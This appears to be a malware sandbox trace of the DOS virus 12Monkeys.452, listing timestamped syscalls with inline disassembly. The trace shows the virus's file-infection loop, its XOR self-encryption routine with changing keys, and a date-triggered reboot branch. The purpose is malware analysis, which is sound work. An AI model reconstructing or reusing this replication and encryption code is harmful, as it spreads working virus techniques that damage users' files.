Sample viewer

vx.netlux.org/Virus.DOS.VCC.12Monkeys.452

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:08:33.200775156Z	26	PC: 13e91 \| Set disk transfer address
2018-12-17T23:08:33.202310003Z	53	PC: 13e97 \| Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:08:33.204394675Z	53	PC: 13ea4 \| Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:08:33.206003427Z	44	PC: 13eaf \| Get time 0x13eaf: cmp dl, 0xd 0x13eb2: jg 0x13eb8 0x13eb4: mov al, 0x82 0x13eb6: out 0x21, al 0x13eb8: mov ah, 0x2c 0x13eba: int 0x21 0x13ebc: cmp dl, 0x32 0x13ebf: jg 0x13f04 0x13ec1: mov ah, 9 0x13ec3: lea dx, word ptr [bp + 0x190] 0x13ec7: int 0x21 0x13ec9: mov ah, 0 0x13ecb: int 0x16 0x13ecd: jmp 0x13f04 0x13ecf: nop 0x13ed0: xor word ptr [bp + si], si 0x13ed2: and byte ptr [di + 0x6f], cl 0x13ed5: outsb dx, byte ptr [si] 0x13ed6: imul sp, word ptr [di + 0x79], 0x73 0x13eda: and byte ptr [bp + si + 0x20], al
2018-12-17T23:08:33.208674092Z	44	PC: 13ebc \| Get time 0x13ebc: cmp dl, 0x32 0x13ebf: jg 0x13f04 0x13ec1: mov ah, 9 0x13ec3: lea dx, word ptr [bp + 0x190] 0x13ec7: int 0x21 0x13ec9: mov ah, 0 0x13ecb: int 0x16 0x13ecd: jmp 0x13f04 0x13ecf: nop 0x13ed0: xor word ptr [bp + si], si 0x13ed2: and byte ptr [di + 0x6f], cl 0x13ed5: outsb dx, byte ptr [si] 0x13ed6: imul sp, word ptr [di + 0x79], 0x73 0x13eda: and byte ptr [bp + si + 0x20], al 0x13edd: push si 0x13ede: imul si, word ptr [bp + si + 0x75], 0x2073 0x13ee3: dec cx 0x13ee4: outsb dx, byte ptr [si] 0x13ee5: arpl word ptr gs:[si + 0x65], si 0x13eea: and word ptr fs:[si], bp
2018-12-17T23:08:33.219425748Z	78	PC: 13f1d \| Find first file
2018-12-17T23:08:33.231892032Z	61	PC: 13f2d \| Open file (Filename = '$AIOUNN��?��!""��S��')
2018-12-17T23:08:33.239925846Z	63	PC: 13f3b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:33.247988354Z	66	PC: 13f4a \| Move file pointer
2018-12-17T23:08:33.249489113Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1c4 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x186 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x62 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2c0] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T23:08:33.252122684Z	64	PC: 13e6b \| Write file or device (Write 452 bytes on handle 5)
2018-12-17T23:08:33.268502457Z	66	PC: 13f5c \| Move file pointer
2018-12-17T23:08:33.273919472Z	64	PC: 13f67 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:33.283324403Z	62	PC: 13f70 \| Close file
2018-12-17T23:08:33.292714849Z	79	PC: 13f1d \| Find next file
2018-12-17T23:08:33.296568077Z	61	PC: 13f2d \| Open file (Filename = '$AIOUNN��?��!""��S��')
2018-12-17T23:08:33.304520118Z	63	PC: 13f3b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:33.312950335Z	66	PC: 13f4a \| Move file pointer
2018-12-17T23:08:33.317107147Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1c4 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x186 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x43 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2c0] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T23:08:33.32118549Z	64	PC: 13e6b \| Write file or device (Write 452 bytes on handle 5)
2018-12-17T23:08:33.325437032Z	66	PC: 13f5c \| Move file pointer
2018-12-17T23:08:33.328608783Z	64	PC: 13f67 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:33.331669897Z	62	PC: 13f70 \| Close file
2018-12-17T23:08:33.340923513Z	79	PC: 13f1d \| Find next file
2018-12-17T23:08:33.344843956Z	61	PC: 13f2d \| Open file (Filename = '$AIOUNN��?��!""��S��')
2018-12-17T23:08:33.354218263Z	63	PC: 13f3b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:33.361441086Z	66	PC: 13f4a \| Move file pointer
2018-12-17T23:08:33.363594099Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1c4 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x186 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x48 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2c0] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T23:08:33.366258765Z	64	PC: 13e6b \| Write file or device (Write 452 bytes on handle 5)
2018-12-17T23:08:33.375724246Z	66	PC: 13f5c \| Move file pointer
2018-12-17T23:08:33.377830499Z	64	PC: 13f67 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:33.385512995Z	62	PC: 13f70 \| Close file
2018-12-17T23:08:33.394637956Z	79	PC: 13f1d \| Find next file
2018-12-17T23:08:33.397863662Z	61	PC: 13f2d \| Open file (Filename = '$AIOUNN��?��!""��S��')
2018-12-17T23:08:33.406856563Z	63	PC: 13f3b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:33.422978538Z	66	PC: 13f4a \| Move file pointer
2018-12-17T23:08:33.424968929Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1c4 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x186 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x4e 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2c0] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T23:08:33.428983303Z	64	PC: 13e6b \| Write file or device (Write 452 bytes on handle 5)
2018-12-17T23:08:33.432707232Z	66	PC: 13f5c \| Move file pointer
2018-12-17T23:08:33.434717972Z	64	PC: 13f67 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:33.439037049Z	62	PC: 13f70 \| Close file
2018-12-17T23:08:33.454691404Z	79	PC: 13f1d \| Find next file
2018-12-17T23:08:33.458238347Z	61	PC: 13f2d \| Open file (Filename = '$AIOUNN��?��!""��S��')
2018-12-17T23:08:33.466589236Z	63	PC: 13f3b \| Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:08:33.475183672Z	66	PC: 13f4a \| Move file pointer
2018-12-17T23:08:33.47701404Z	44	PC: 13e54 \| Get time 0x13e54: cmp dl, 0 0x13e57: je 0x13e50 0x13e59: mov byte ptr [bp + 0x138], dl 0x13e5d: call 0x13e6f 0x13e60: mov ah, 0x40 0x13e62: mov cx, 0x1c4 0x13e65: lea dx, word ptr [bp + 0x100] 0x13e69: int 0x21 0x13e6b: call 0x13e6f 0x13e6e: ret 0x13e6f: mov cx, 0x186 0x13e72: lea si, word ptr [bp + 0x13e] 0x13e76: xor byte ptr [si], 0x53 0x13e79: inc si 0x13e7a: dec cx 0x13e7b: jne 0x13e76 0x13e7d: ret 0x13e7e: lea si, word ptr [bp + 0x2c0] 0x13e82: mov di, 0x100 0x13e85: movsw word ptr es:[di], word ptr [si]
2018-12-17T23:08:33.480711181Z	64	PC: 13e6b \| Write file or device (Write 452 bytes on handle 5)
2018-12-17T23:08:33.484001266Z	66	PC: 13f5c \| Move file pointer
2018-12-17T23:08:33.485864744Z	64	PC: 13f67 \| Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:33.489136703Z	62	PC: 13f70 \| Close file
2018-12-17T23:08:33.498275431Z	42	PC: 13f85 \| Get date 0x13f85: cmp dh, 0x11 0x13f88: jl 0x13fa9 0x13f8a: cmp dl, 8 0x13f8d: jl 0x13fa9 0x13f8f: mov ah, 0x19 0x13f91: int 0x21 0x13f93: mov cx, 0x25 0x13f96: mov dx, 0 0x13f99: lea bx, word ptr [bp + 0x190] 0x13f9d: push ds 0x13f9e: pop es 0x13f9f: mov byte ptr [bp + 0x265], 0x26 0x13fa4: int 0x19 0x13fa6: add sp, 2 0x13fa9: mov ah, 0x1a 0x13fab: mov dx, 0x80 0x13fae: int 0x21 0x13fb0: mov cx, 7 0x13fb3: push cx 0x13fb4: mov dx, 0x140
2018-12-17T23:08:33.500688673Z	26	PC: 13fb0 \| Set disk transfer address